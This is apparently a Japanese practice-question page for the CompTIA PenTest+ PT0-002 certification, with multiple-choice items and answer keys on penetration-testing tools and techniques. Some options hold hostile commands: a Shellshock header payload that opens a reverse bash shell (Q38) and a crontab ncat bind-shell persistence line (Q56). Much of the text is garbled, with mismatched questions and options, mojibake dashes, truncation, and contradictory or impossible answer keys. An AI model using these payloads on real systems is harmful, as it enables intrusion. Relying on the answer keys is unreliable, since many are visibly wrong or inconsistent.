すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

効果的な準備のための最新のCompTIA PenTest+ PT0-002試験問題集

当社の豊富な試験問題集、入念に作成された試験問題、貴重な試験資料は、あなたの旅をサポートします。試験で出題されるすべての主要なトピックをカバーするように設計された包括的な学習教材を使用して、自信を持って準備を進めてください。侵入テストの方法論から脆弱性の評価と管理まで、当社のリソースは、あなたの理解を深め、試験への準備態勢を高めるように調整されています。模擬試験は、あなたの知識を評価し、試験環境をシミュレートするのに最適なツールです。長所と短所を見極め、スキルを磨き、自信を持って試験当日を迎えましょう。 弊社の専門家による指導と一流の学習教材でCompTIA PenTest+ PT0-002試験に合格し、サイバーセキュリティのキャリアを最高のものにしましょう。試験の成功に向けて、今すぐ準備を始めましょう!
他のオンライン試験を受ける

質問 #1
ある侵入テスト実施者が、発見トラバーサル経由でパスにアップロードする能力を提供する脆弱性を発見しました。この脆弱性によって発見されたファイルのいくつかは、次のとおりです。攻撃者が影響を受けたマシンに内部アクセスするための最も良い方法はどれですか?
A. 機密性の高い顧客データが一般に公開されているかどうか
B. クラウドとクライアント間の接続が安全かどうか
C. 顧客の従業員がプラットフォームを使用するための適切なトレーニングを受けているかどうか
D. クラウドアプリケーションが安全なSDLCを使用して開発されたかどうか
回答を見る
正解: C
質問 #2
あるソフトウェア会社が、自社のソフトウェア開発手法のセキュリティを評価するために、セキュリティコンサルタントを雇った。このコンサルタントは、ソフトウェアバイナリに対してファジングを実行することで、偵察を開始することを選択した。次のうち、セキュリティコンサルタントが特定する可能性が最も高い脆弱性はどれか?
A. 弱い認証方式
B. 文字列に格納された認証情報
C. バッファオーバーフロー
D. 最適化されていないリソース管理
回答を見る
正解: C
質問 #3
開発者向けのアプリケーションセキュリティ評価報告書に含まれる可能性が最も高い情報は、次のうちどれですか?(つ選んでください。)
A. ヒドラ
B. 切り裂きジョン
C. カインとアベル
D. メドゥーサ
回答を見る
正解: BC
質問 #4
ある侵入テスト実施者は、192.168.1.0/24の範囲にある一連のターゲットを攻撃し、できるだけ少ないアラームと対策を発動させるという任務を与えられている。次のNmapスキャン構文のうち、この目的を達成するのに最適なものはどれか。
A. nmap ג€"sT ג€"vvv ג€"O 192
B. nmap ג€"sV 192
C. nmap ג€"sA ג€"v ג€"O 192
D. nmap ג€"sS ג€"O 192
回答を見る
正解: D
質問 #5
ある侵入テスト実施者が、侵入テストの終了時に後始末を行い、痕跡を消しています。次のうち、テスト者がシステムから必ず削除すべきものはどれですか。(2つ選んでください)。
A. 産卵貝
B. ユーザーアカウントの作成
C. サーバーログ
D. 管理者アカウント
E. システムを再起動する。
F. ARPキャッシュ
回答を見る
正解: BC
質問 #6
あるメールサービス会社が、以前のスタッフのアカウントがまだ有効かどうかを識別するために、SMTPサーバー上のすべてのユーザーアカウントの列挙を実施するために侵入テスト実施者を雇った。目標を達成するために使用すべきコマンドはどれか。
A. VRFYとEXPN
B. VRFYとTURN
C. EXPNとTURN
D. RCPT TOとVRFY
回答を見る
正解: A
質問 #7
ある侵入テスト実施者が、危殆化したウェブサーバーからJavaアプリケーションファイルをダウンロードし、次のログを見ることによって、それを呼び出す方法を特定した。Javaアプリケーションがソケット経由の暗号化を使用しているかどうかを検証するために、侵入テスト実施者が従うべき手順の順序はどれか。
A. アプリケーションの脆弱性スキャンを実行し、アプリケーションが使用する TCP ポートを特定する。
B. デバッガに接続してアプリケーションを実行し、アプリケーションのログを確認してください。
C. バイナリコードを逆アセンブルし、ブレークポイントを特定する。
D. Wiresharkでパケットキャプチャを開始し、アプリケーションを実行します。
回答を見る
正解: D
質問 #8
ある侵入テスト実施者がアセスメントを完了し、テスト中に作成されたすべての成果物とアカウントを削除し、調査結果をクライアントに提示しました。次に起こることはどれですか?
A. 侵入テスト実施者が再テストを実施する。
B. 侵入テスト実施者は、クライアントマシンからすべてのスクリプトを削除します。
C. クライアントがシステムにパッチを適用する。
D. クライアントは、テスト中に生成されたシステムログを消去する。
回答を見る
正解: C
質問 #9
次の状況のうち、侵入テスト実施者が緊急連絡先に通知する必要があるのはどれか。
A. チームは組織内の重要なサーバーを悪用する。
B. PIIまたはクレジットカードのデータを組織から流出させる。
C. チームはリモートでネットワークにアクセスできなくなる。
D. チームは、ネットワーク上のシステム上に別のアクターを発見する。
回答を見る
正解: D
質問 #10
ある侵入テスト実施者が、MITRE ATT&CK フレームワークをある企業の法律顧問に説明しています。
A. セキュリティ侵入の手口を理解することで、侵入を阻止することができる。
B. フレームワークの一部であるスクリプトは、SIEMツールに直接インポートできる。
C. この方法論は、事故のコストをよりよく見積もるために使うことができる。
D. フレームワークは静的なものであり、長期にわたってセキュリティプログラムの安定性を保証する。
回答を見る
正解: A
質問 #11
ペネトレーション・テスト中に実施される一連の具体的な手順とアプローチを定義する概念は、次のうちどれか。
A. スコープの詳細
B. 所見
C. 方法論
D. 作業明細書
回答を見る
正解: C
質問 #12
http://www.example.com/product.php?id=123987.Which、この URL の脆弱性を特定しようとする場合、次の自動化ツールのうち NEXT を使用するのが最善でしょうか?
A. SQLマップ
B. ネサス
C. ニクト
D. ディルバスター
回答を見る
正解: A
質問 #13
ある侵入テスト実施者が、あるウェブサーバに対して脆弱性スキャンを実施し、1つの深刻な脆弱性を特定しました。
A. 別のスキャナーで比較してください。
B. サーバーで手動テストを実行する。
C. スキャナーで結果を確認する。
D. オンラインで脆弱性を探す。
回答を見る
正解: B
質問 #14
DRAG DROP(ドラッグアンドドロップはサポートされていません)侵入テスト中に、限定的なユーザーインターフェイスを持つシステムにアクセスします。このマシンは、ポート スキャンを行う隔離されたネットワークにアクセスできるようです。手順コード セグメントを分析して、ポート スキャン スクリプトを完成させるために必要なセクションを特定します。
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #15
ある侵入テスト実施者が、モバイルアプリケーションの新バージョンをサンドボックス環境でテストしている。アプリケーションと外部 API との間のトラフィックを傍受し、復号化するために、テスト者はプライベートのルート CA を作成し、そこから証明書を発行した。テストに使用したスマートフォンの信頼できる石にルート CA をインストールしたにもかかわらず、アプリケーションは証明書の不一致を示すエラーを表示し、サーバに接続しません。次のうち、最も可能性の高い理由はどれか。
A. ファイアウォールでTCP443番ポートが開いていない。
B. APIサーバーがTLSではなくSSLを使用している
C. テスターが古いバージョンのアプリケーションを使用している。
D. アプリケーションにAPI証明書が固定されている。
回答を見る
正解: D
質問 #16
ある民間調査会社が、攻撃者がモバイル・デバイスにアクセスし、そのデバイスからデータを流出させ る可能性を判断するために、侵入テストを依頼しています。次のうち、成功すれば両方の目的を達成できる可能性が最も高いソーシャルエンジニアリング手法はどれか。
A. 悪意のあるアプリケーションをダウンロードするためのリンクを含む、なりすましのサービス番号でSMSを送信する。
B. MDMの脆弱性を突いて、新しいアカウントとデバイスプロファイルを作成する。
C. ITヘルプデスクでビッシングを実行し、マスカレード用に承認されたデバイスのIMEIのリストを収集する。
D. 従業員がよく利用するウェブサイトに、x86アーキテクチャを標的としたマルウェアを侵入させる。
回答を見る
正解: A
質問 #17
あるセキュリティ専門家が、TCPポート3011でリッスンしているプロプライエタリサービスに無効なパケットを送信して、IoTデバイスをテストしたいと考えています。セキュリティの専門家が、TCPヘッダの長さとチェックサムを、任意の数値を使って簡単かつプログラム的に操作し、プロプライエタリ・サービスがどのように応答するかを観察できるようになるのは、次のうちどれでしょうか?
A. エヌマップ
B. tcpdump
C. スキャピー
D. hping3
回答を見る
正解: C
質問 #18
侵入テスト者はオンパスの攻撃位置を確立し、ターゲットホストに送り返すDNSクエリ応答を特別に作成しなければならない。
A. ソカット
B. tcpdump
C. スキャピー
D. ディグ
回答を見る
正解: C
質問 #19
ある企業の調査チームが、最終報告書の中で最も興味を示すのは次のうちどれだろうか?
A. 要旨
B. 攻撃TTP
C. 方法論
D. スコープの詳細
回答を見る
正解: B
質問 #20
会社から依頼された評価を行っている侵入テスト実施者は、二重タグ付けによって別のシステムにトラフィックを送信したいと考えている。
A. RFIDクローニング
B. RFIDタギング
C. メタタグ
D. タグネスティング
回答を見る
正解: D
質問 #21
情報セキュリティ最高責任者が、侵入テスト実施者に会社の従業員のセキュリティ意識レベルを評価させたいと考えている。
A. メタスプロイト
B. ヒドラ
C. SET
D. WPSスキャン
回答を見る
正解: C
質問 #22
ある会社が、製造工場のサイバーフィジカルシステムをレビューするために侵入テストチームを雇った。チームは、監視システムと PLC がともに会社のイントラネットに接続されていることを即座に発見した。侵入テストチームが行ったと仮定した場合、最も妥当である可能性が高いのはどれか。
A. PLCは、ネットワーク経由で注入されたコマンドには反応しません。
B. スーパーバイザーとコントローラーは、デフォルトでは別の仮想ネットワーク上にあります。
C. コントローラは、コマンドの発信元を検証しません。
D. 監督システムは、コード/コマンドの悪意のある注入を検出する。
回答を見る
正解: C
質問 #23
ある侵入テスト実施者が次のスクリプトを書いた。
A. サービスの脆弱性を探す
B. 失われたバインドシェルを復元しようとしている
C. 指定したポートをリッスンするリバースシェルの構築
D. 特定のオープンポートについてネットワークをスキャンする
回答を見る
正解: D
質問 #24
ある侵入テスト実施者が、顧客の建物内の安全な部屋にアクセスするための物理的な侵入テストを実施するために雇われた。外部偵察は、2つの入口、WiFiゲストネットワーク、インターネットに接続された複数のセキュリティカメラを特定します。
A. ウォードライビング
B. 初段
C. リコン
D. エアクラック
回答を見る
正解: B
質問 #25
Nmapスキャンは、Webサーバとデータベースのオープンポートを表示します。侵入テスト者は、これらのシステムに関する脆弱性と追加情報を特定するために、WPScanとSQLmapを実行することにしました。
A. 収集した証拠に基づき、潜在的な犯罪行為を発見する。
B. 環境内のすべての脆弱性を特定する。
C. 範囲に基づいて侵襲性を制限する。
D. 調査結果の秘密を保持すること。
回答を見る
正解: B
質問 #26
ある企業が侵入テスト担当者を雇い、ネットワーク上に不正なアクセスポイントを配備して設定させた。この目的を達成するために使用するツールとして、最も適切なものはどれか。
A. ワイヤーシャーク
B. エアクラック
C. キスメット
D. ウィファイト
回答を見る
正解: B
質問 #27
Nmapネットワークスキャンで、特定されたサービスを持つ5つのオープンポートが見つかりました。侵入テスト担当者が、オープンポートに関連するエクスプロイトを含む脆弱性が存在するかどうかを判断するためにNEXTを使用すべきツールはどれか。
A. オープンバス
B. ドローザー
C. バープ・スイート
D. OWASP ZAP
回答を見る
正解: A
質問 #28
侵入テスト者がシステムにアクセスし、パーシステンスを確立した後、次のコマンドを実行する。
A. Bashの履歴を/dev/nullにリダイレクトする
B. さらに列挙するために、ユーザーのBash履歴のコピーを作成する。
C. Bashの履歴を消去して痕跡を消す
D. システム上におとりファイルを作成し、インシデント対応者を混乱させる。
回答を見る
正解: C
質問 #29
ある侵入テスト実施者が次のスクリプトを作成しました。
A. ネットワーク上のアクティブなホストを特定する。
B. ステルスのためにpingパケットのTTLを設定する。
C. ネットワーク機器のARPテーブルを埋める。
D. 最も使用されているポートでシステムをスキャンする。
回答を見る
正解: A
質問 #30
侵入テスト者がシステムにアクセスし、パーシステンスを確立した後、次のコマンドを実行する。
A. Bashの履歴を/dev/nullにリダイレクトする
B. さらに列挙するために、ユーザーのBash履歴のコピーを作成する。
C. Bashの履歴を消去して痕跡を消す
D. システム上におとりファイルを作成し、インシデント対応者を混乱させる。
回答を見る
正解: C
質問 #31
ある侵入テスト実施者が、施錠された門、セキュリティチーム、カメラで警備されている建物にアクセスする必要がある。発見されずにITフレームワークにアクセスするために、テスト者が使用できるテクニックは次のうちどれですか?
A. 鍵を開ける。
B. 遠隔操作でカメラを無効にする。
C. 荷物の配達員になりすます。
D. フィッシングメールを送る。
回答を見る
正解: C
質問 #32
前のシステムにアクセスした後、侵入テスト者はネットワークに対してNmapスキャンを実行し、次の結果を得ました。
A. アクティブスキャン
B. ピン・スイープ
C. プロトコルの反転
D. パケット解析
回答を見る
正解: A
質問 #33
ある侵入テスト者が無線ネットワークを評価している。正しいチャネルとSSIDを監視していますが、テスト者はクライアントとAP間のハンドシェイクをキャプチャできません。侵入テスト者がハンドシェイクをキャプチャできるようにするには、次の攻撃のうちどれが最も効果的ですか。
A. キーの再インストール
B. 認証解除
C. 邪悪な双子
D. リプレイ
回答を見る
正解: B
質問 #34
ある侵入テスト実施者が、評価のためにスコープされた16ビットのネットワークブロックを受け取った。アセスメントの間、テスト者は提供されたIPブロックにアクティブなホストがないことに気づき、会社に報告した。その後、会社は更新されたIPブロックをテスターに提供した。次のステップのうち、最も適切なものはどれでしょうか。
A. 契約を解除する。
B. ROEを新しい署名で更新する。
C. 8ビットブロックをスキャンして、さらにミスしたホストをマッピングする。
D. 評価を続ける。
回答を見る
正解: B
質問 #35
ある侵入テスト実施者は、クライアントとサーバ間の NTLM チャレンジ-レスポンストラフィックをキャプチャすることができた。
A. 垂直的な特権昇格を実行する。
B. キャプチャしたトラフィックをサーバーで再生し、セッションを再作成する。
C. John the Ripperを使ってパスワードを解読する。
D. パスザハッシュ攻撃を利用する。
回答を見る
正解: D
質問 #36
次のうち、OWASPトップ10を最もよく表しているものはどれか(2つ選んでください)。
A. ウェブアプリケーションの最も重大なリスク
B. ウェブアプリケーションのリスク一覧
C. 重要性の高い順に定義されたリスク
D. ウェブアプリケーションのセキュリティ基準
E. A リスク・ガバナンスとコンプライアンスの枠組み
F. Apacheの脆弱性のチェックリスト
回答を見る
正解: AC
質問 #37
あるコンサルタントが、断続的な接続性の問題が報告された後、以下の出力を確認している。
A. ネットワーク上のデバイスが、間違ったサブネットにIPアドレスを持っている。
B. 誤ったマルチキャストグループを使用してマルチキャストセッションが開始された。
C. ARPフラッディング攻撃は、DDoSを実行するためにブロードキャストアドレスを使用します。
D. ネットワーク上のデバイスがARPキャッシュを汚染した。
回答を見る
正解: D
質問 #38
ある侵入テスト実施者が、10.10.1.1 に脆弱なウェブサーバを発見した。そしてテスト者は、Webエクスプロイトを送信するPythonスクリプトを編集し、以下のコードに出くわした。 exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} サーバーが実行されているユーザーコンテキストを判断するために、テス ターがスクリプトに加えるべき編集は次のうちどれでしょうか?
A. exploit = {גUser-Agentג: ג() { ignored;};/bin/bash -i id;whoamiג, גAcceptג: גtext/html,application/xhtml +xml,application/xmlג}
B. exploit = {גUser-Agentג: ג() { ignored;};/bin/bash -i>& find / -perm -4000ג, גAcceptג: גtext/html,application/xhtml +xml,application/xmlג}
C. exploit = {גUser-Agentג: ג() { ignored;};/bin/sh -i ps -efג€ 0>&1ג, גAcceptג: גtext/html,application/xhtml+xml,application/xmlג}}。
D. exploit = {גUser-Agentג: ג() { ignored;};/bin/bash -i>& /dev/tcp/10
回答を見る
正解: A
質問 #39
警告:mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62ウェブサイトをさらに攻撃するために使用できるコマンドはどれか?
A. ターゲットホストにアクセスし、この目的のために特別に作られたマルウェアを埋め込む。
B. ローカルDNSサーバーを悪用し、スプーフィングしたAレコードでゾーンレコードを追加/更新する。
C. Scapyユーティリティを使用して、DNSクエリ応答内の名前解決フィールドを上書きする。
D. ターゲットホストからなりすましホストへのHTTP接続をプロキシする。
回答を見る
正解: D
質問 #40
セキュリティ評価を行っている侵入テスト実施者が、重要な脆弱性がサイバー犯罪者によって活発に悪用されていることを発見した。
A. 一次コンタクトポイントに連絡を取る。
B. 攻撃者を倒そうとする。
C. すぐに警察当局に連絡する。
D. 適切な証拠を収集し、最終報告書に加える。
回答を見る
正解: A
質問 #41
アプリケーション開発者チームを対象として作成された静的アプリケーションセキュリティテストの最終報告書に含めることが最も重要なものはどれですか?
A. 使用した侵入テスト方法の要旨
B. 消耗品、外注費、査定中に発生した費用を含む部品表
C. ソフトウェア侵害が成功した場合の定量的影響評価
D. 安全でない型キャスト操作のインスタンスのコードコンテキスト
回答を見る
正解: C
質問 #42
ある侵入テスト実施者が、ある業務で使用する次のスクリプトを作成しました。
A. 新たにペネトレーションテストを実施する。
B. 調査結果を改善する。
C. 一般的な脆弱性とエクスポージャーのリストを提供する。
D. 侵入テストの範囲を広げる。
回答を見る
正解: A
質問 #43
Bashで解釈することを目的としたシェルスクリプトを開発する場合、インタプリタ/bin/bashを明示的に指定する必要がある。この目的を達成するために、スクリプトの最初の行で使用すべき文字の組み合わせはどれか。
A. <#
B. <$
C. ##
D. #$
E. #!
回答を見る
正解: E
質問 #44
ある侵入テスト実施者が、あるドメインでウェブ上に公開されている文書に隠された情報を見つけたいと考えている。侵入テスト者は次のどれを使うべきか?
A. ネットクラフト
B. セントラルオプス
C. レスポンダー
D. FOCA
回答を見る
正解: D
質問 #45
コンプライアンス・ベースのペネトレーション・テストは、主に次のような点を重視する:
A. 保護されたネットワークからPIIを取得する。
B. エッジデバイスの保護をバイパスする。
C. 特定のセキュリティ標準の有効性を判断する。
D. 保護されたネットワークから特定の情報を取得する。
回答を見る
正解: C
質問 #46
ある企業が、ネットワーク帯域幅を共有するクラウドプロバイダーを利用して、専用サーバー上でウェブアプリケーションをホストしている。同社はクラウドプロバイダと連絡を取り合い、クラウドプロバイダの他の顧客に干渉するような行為を防止している。アプリケーションをテストするために侵入テスト会社に依頼する場合、会社は次のうちどれを避けるべきか?
A. ウェブアプリケーションの URL をクロールして脆弱性を探す。
B. アプリケーションの全サーバの IP アドレスをフィンガープリントする。
C. アプリケーションのパスワードをブルートフォースする。
D. DDoS 防御をテストするために、毎秒多数のウェブリクエストを送信する。
回答を見る
正解: D
質問 #47
ある侵入テスト実施者が、単純なPythonベースのスキャナを実行した。このスクリプトが、組織の IDS で「ポートスキャンの可能性がある」アラートをトリガーした理由を説明するのに最も適切なものは、次のうちどれですか?
7行目のA. sock
1行目のB. *range(1, 1025)は、portListリストを数値順に入力した。
C. 6行目は、socket
D. remoteSvr変数はタイプヒントも初期化もされていません。
回答を見る
正解: B
質問 #48
ペネトレーションテスターとクライアントの間で、提供された情報が契約前、契約中、契約後にどのように管理されるかを規定するために署名しなければならない文書は、次のうちどれですか?
A. MSA
B. NDA
C. SOW
D. ROE
回答を見る
正解: B
質問 #49
ある侵入テスト実施者が、あるマシンでunshadowコマンドを実行する。このテスト実施者が次に使用する可能性が最も高いツールはどれか。
A. 切り裂きジョン
B. ヒドラ
C. ミミカッツ
D. カインとアベル
回答を見る
正解: A
質問 #50
ある侵入テスト実施者が侵入テストを行っている。このテスト実施者は、Linuxサーバ上でルートレベルのシェルを取得し、/home/svsacctディレクトリ内のpassword.txtというファイルに次のデータがあることを発見する。
A. echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d
B. tar zxvf password
C. hydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192
D. john --wordlist /usr/share/seclists/rockyou
回答を見る
正解: A
質問 #51
ある侵入テスト担当者が、あるファイルの中に次のような文字列のリストがあることを発見した。
A. 辞書攻撃
B. レインボーテーブル攻撃
C. ブルートフォース・アタック
D. クレデンシャル・スタッフィング攻撃
回答を見る
正解: B
質問 #52
ある侵入テスト実施者は、あるクライアントのために、会社の業務に最小限の混乱しか与えないような活動を行う準備をしている。(2つ選びなさい)
A. nmap -P0 -T0 -sS 192
B. nmap -sA -sV --host-timeout 60 192
C. nmap -f --badsum 192
D. nmap -A -n 192
回答を見る
正解: AE
質問 #53
ある企業は、クラウド・サービス・プロバイダーが自社のソフトウェア開発を格納するVMを適切に保護していないことを懸念している。VMはデータセンターに収容され、他の企業が物理リソースを共有しています。次の攻撃タイプのうち、同社が最も懸念しているのはどれですか?
A. データの洪水
B. セッション
C. サイバースクワッティング
D. サイドチャンネル
回答を見る
正解: D
質問 #54
ある侵入テスト実施者が、アクティブなシステムを迅速に特定するために、クラス C ネットワークを調査しています。侵入テスト担当者が使用すべきコマンドはどれか。
A. nmap -sn 192
B. nmap -sn 192
C. nmap -sn 192
D. nmap -sN 192
回答を見る
正解: B
質問 #55
侵入テスト実施者が、侵入したWindowsサーバー上でsdelete mimikatz.というコマンドを実行する理由を説明したものはどれか。 * を実行する理由を説明するものはどれか。
A. ハッシュをクラッキングするレジストリエントリを削除するには
B. テスターが作成したMimikatzアカウントを削除するには
C. サーバーからツールを削除する
D. システムからリバースシェルを削除する
回答を見る
正解: C
質問 #56
ある侵入テスト実施者が、モバイルクライアントのラップトップ上のWindowsワークステーションへのアクセスに成功した。テスト実施者がシステムへのアクセスを維持できるようにするために使用できるのはどれか。
A. schtasks /create /sc /ONSTART /tr C:|Temp|WindowsUpdate
B. wmic startup get caption,command
C. crontab -l; echo ?€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash?)| crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
回答を見る
正解: C
質問 #57
次のうち、最も幅広いターゲット・システム・タイプをカバーするペイロード・モジュールを備えたエクスプロイト・スイートを提供するのはどれか。
A. ネサス
B. メタスプロイト
C. バープ・スイート
D. イーサキャップ
回答を見る
正解: B
質問 #58
ある企業が、ネットワーク帯域幅を共有するクラウドプロバイダーを利用して、専用サーバー上でウェブアプリケーションをホストしている。同社はクラウドプロバイダと連絡を取り合い、クラウドプロバイダの他の顧客に干渉するような行為を防止している。アプリケーションをテストするために侵入テスト会社に依頼する場合、会社は次のうちどれを避けるべきか?
A. ウェブアプリケーションのURLをクロールして脆弱性を探す。
B. アプリケーションサーバーのすべてのIPアドレスをフィンガープリントする。
C. アプリケーションのパスワードをブルートフォースする
D. 毎秒多数のウェブリクエストを送信してDDoS防御をテストする
回答を見る
正解: D
質問 #59
攻撃者が使用する一般的な戦術とテクニックのマトリックスと、推奨される緩和策を提供するものはどれか。
A. NIST SP 800-53
B. OWASPトップ10
C. MITRE ATT&CKフレームワーク
D. PTESテクニカルガイドライン
回答を見る
正解: C
質問 #60
ある侵入テスト実施者が、digによるcomptia.orgの以下のDNS偵察結果を確認している。3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org.3569 IN A 3.219.13.186. comptia.org.3569 IN NS ns1.comptia.org. comptia.org.3569 IN SOA haven. administrator.comptia.org. comptia.org.3569 IN MX new.mx0.comptia.org. comptia.org.3569 IN MX new.mx1.comptia.org.この出力に基づいて、侵入テスト担当者が特定できる潜在的な問題はどれか。
A. 少なくとも1つの記録は範囲外です。
B. MXレコードが重複している。
C. NSレコードが適切なドメイン内にない。
D. comptia
回答を見る
正解: A
質問 #61
クラウド環境で侵入テストを行う場合、侵入テスト実施者が最初に考慮すべきことはどれか。
A. クラウドサービスプロバイダーが侵入テスト実施者に環境テストを許可しているかどうか
B. 特定のクラウドサービスがアプリケーションで使用されているかどうか
C. クラウドサービスが稼働している地理的な場所
D. クラウドサービスの拠点となる国に、障害となる法律があるかどうか
回答を見る
正解: A
質問 #62
ある侵入テスト実施者が、インターネットに面したネットワークデバイスのNmapスキャンを-Fオプション付きで実行し、いくつかのオープンポートを発見した。nmap -O -A -sS -p- 100.100.100.50Nmapは、すべての65,535ポートがフィルタリングされていることを返した2回目のスキャンで発生した可能性が最も高いのはどれか。
A. ファイアウォールまたはIPSがスキャンをブロックした。
B. 侵入テスト担当者はサポートされていないフラグを使用した。
C. エッジネットワーク機器が切断された。
D. スキャンはICMPエコー応答を返した。
回答を見る
正解: A
質問 #63
クラウド環境で侵入テストを行う場合、侵入テスト実施者が最初に考慮すべきことはどれか。
A. クラウド・サービス・プロバイダーが、侵入テスト実施者に環境のテストを許可しているかどうか。
B. 特定のクラウドサービスがアプリケーションによって使用されているかどうか。
C. クラウドサービスが稼働している地理的位置
D. クラウドサービスの拠点となる国に、障害となる法律があるかどうか。
回答を見る
正解: C
質問 #64
評価者は、Nmapスキャンをできるだけ静かに実行したいと考えている。次のコマンドのうち、検出の可能性が最も低いものはどれか。
A. 開いているポートを探す。
B. リバースシェルを聴く。
C. オープンポートのフラッディングを試みる。
D. 暗号化トンネルを作成する。
回答を見る
正解: C
質問 #65
ある侵入テスト実施者が、業務で使用する認証情報を探すために .pcap ファイルを受け取った。.pcap ファイルを開いて読むために、テスト実施者が利用すべきツールはどれか。
A. エヌマップ
B. ワイヤーシャーク
C. メタスプロイト
D. ネットキャット
回答を見る
正解: B
質問 #66
ある侵入テスト実施者がサーバに対してスキャンを実行し、次のような出力を得ました。
A. ftp 192
B. smbclient \I 192
C. ncrack -u Administrator -P 15worst_passwords
D. curl -X TRACE https://192
回答を見る
正解: A
質問 #67
ある侵入テスト実施者は、サーバーからMD5ハッシュを収集し、レインボーテーブルを使ってハッシュを簡単にクラックすることができた。
A. より強力なアルゴリズム要件
B. サーバーのアクセス制御
C. ユーザーパスワードの暗号化
D. パッチ管理プログラム
回答を見る
正解: A
質問 #68
ある侵入テスト実施者が、ある企業のネットワーク境界を評価している。テスト者は、防御的なコントロールや対策について限られた情報しか受け取っておらず、テストに関する内部知識も限られている。偵察活動を計画するための最初のステップはどれか。
A. ネットブロックの外部スキャンを開始する。
B. WHOISとnetblockの記録をチェックする。
C. DNSルックアップとディグを使って外部ホストを特定する。
D. 会社のネットブロックのpingスイープを実施する。
回答を見る
正解: B
質問 #69
侵入テストの間、テスト者は URL の値を example.com/login.php?id=5 から example.com/login.php?id=10 に変更し、ウェブ・アプリケーションにアクセスすることができました。侵入テスト者は以下の脆弱性のどれを突きましたか?
A. コマンド・インジェクション
B. 壊れた認証
C. オブジェクトの直接参照
D. クロスサイトスクリプティング
回答を見る
正解: B
質問 #70
侵入テスト担当者がターゲットに対してNmapスキャンを実施し、次の結果を受け取った。ターゲット上でTCPポート1080を使用するスキャンツールをリダイレクトするために、テスト担当者が使用すべきものはどれか。
A. ネサス
B. プロキシチェーン
C. OWASP ZAP
D. エンパイア
回答を見る
正解: B
質問 #71
IoT デバイスのベンダー情報やその他のセキュリティ関連情報を収集し、パッシブ偵察に役立てるのに最も有用なツールはどれか。
A. 初段
B. Nmap
C. WebScarab-NG
D. ネサス
回答を見る
正解: B
質問 #72
あるセキュリティエンジニアが、ネットワーク上の新しいサーバを特定し、そのホストをスキャンして、そのホストが承認されたバージョンのLinuxとパッチが適用されたバージョンのApacheを実行しているかどうかを判断しようとしている。このタスクを達成するコマンドはどれか。
A. nmap ג€"f ג€"sV ג€"p80 192
B. nmap ג€"sS ג€"sL ג€"p80 192
C. nmap ג€"A ג€"T4 ג€"p80 192
D. nmap ג€"O ג€"v ג€"p80 192
回答を見る
正解: C
質問 #73
ある侵入テスト実施者が、dirbユーティリティを使ってウェブサーバをスキャンした結果、次のような結果を得た。
A. index
B. 約
C. 情報
D. home
回答を見る
正解: B
質問 #74
ある侵入テスト実施者が、物理的な入退室管理システムで使用される特殊なTCPサービスを介して、攻撃者がドアを開けることを可能にする脆弱性を探している。このサービスは 100 以上の異なるホストに存在するので、テスト者は評価を自動化したい。識別は、侵入テスト者に次のことを要求する:-完全なTCP接続を持つ-`hello`ペイロードを送信する-応答を待つ-16バイトより長い文字列を送信する。
A. Run nmap -Pn -sV --script vuln
B. ホストのTCPポートに対してOpenVASシンプルスキャンを採用する。
C. Lua言語でスクリプトを作成し、NSEで使用する。
D. Nessusで認証スキャンを実行する。
回答を見る
正解: C
質問 #75
PCI DSS は、侵入テストプロセスの一部として、次のどれを要求していますか?
A. ペネトレーション・テスターはサイバーセキュリティの資格を持っていなければならない。
B. ネットワークがセグメント化されていること。
C. 外部に面しているシステムのみをテストすべきである。
D. 査定は勤務時間外に行わなければならない。
回答を見る
正解: B
質問 #76
最終的なセキュリティ評価報告書を電子メールで送信する際、送信中の機密を保護するプロトコルや技術はどれか。
A. S/MIME
B. FTPS
C. DNSSEC
D. AS2
回答を見る
正解: A
質問 #77
あるコンサルタントは、リモートホスト上のすべてのオープンポートのSYNスキャンを実行したばかりであり、今度はそのホスト上で実行されているサービスの種類をリモートで特定する必要がある。このタスクを達成するために使用するアクティブな偵察ツールとして最適なものは次のうちどれですか。
A. tcpdump
B. スノート
C. Nmap(エヌマップ
D. ネットスタット
E. ファザー
回答を見る
正解: C
質問 #78
ある侵入テスト実施者は、Nmapスキャンから次の結果を受け取った:ターゲットが実行している可能性が最も高いOSはどれか?
A. CentOS
B. Arch Linux
C. ウィンドウズ・サーバー
D. ウブントゥ
回答を見る
正解: C
質問 #79
一般的なITサーバーと産業用制御システムを含むハイブリッド・ネットワーク・セグメントで脆弱性スキャナーを実行する:
A. Modbusプロトコルの脆弱性を明らかにする。
B. 制御システムに意図しない障害を引き起こす可能性がある。
C. 所見の真陽性率を低下させる可能性がある。
D. IPネットワーク上にサービス拒否状態を作り出す。
回答を見る
正解: B
質問 #80
ある侵入テスト者がWindowsホストへのシェルアクセス権を取得し、ymic.exeプロセスコールcreate関数を使用して後で実行するために、特別に細工したバイナリを実行しようとしている。この目的をサポートする可能性が最も高いOSまたはファイルシステムのメカニズムはどれか。
A. 代替データストリーム
B. PowerShellモジュール
C. MP4ステガノグラフィー
D. プロックモン
回答を見る
正解: D
質問 #81
ある会社の最高経営責任者がセカンダリーホームオフィスを設立し、使用されているWiFiサービスが攻撃に対して脆弱であることを懸念している。次のうち、ブルートフォース攻撃に対して最も脆弱なものはどれですか?
A. WPS
B. WPA2-EAP
C. WPA-TKIP
D. WPA2-PSK
回答を見る
正解: A
質問 #82
保護されていないネットワーク・ファイル・レポジトリで、侵入テスト実施者が、ユーザー名とパスワー ドを平文で含むテキストファイルと、フルネーム、役割、シリアル番号など、従業員50人分のデータ を含むスプレッドシートを発見した。テスト者は、テキストファイルのパスワードの一部が次のような形式になっていることに気づく:<この情報を使ってテスト者が次に取るべき行動として、最も適切なものはどれか。
A. パスワードスプレーテストの準備として、カスタムパスワード辞書を作成する。
B. パスワードを安全に保管するために、テキストファイルの代わりにパスワードマネージャー/ボールトを使用することを勧める。
C. すべてのシステムとアプリケーションにパスワードの複雑性ルールを設定することを勧める。
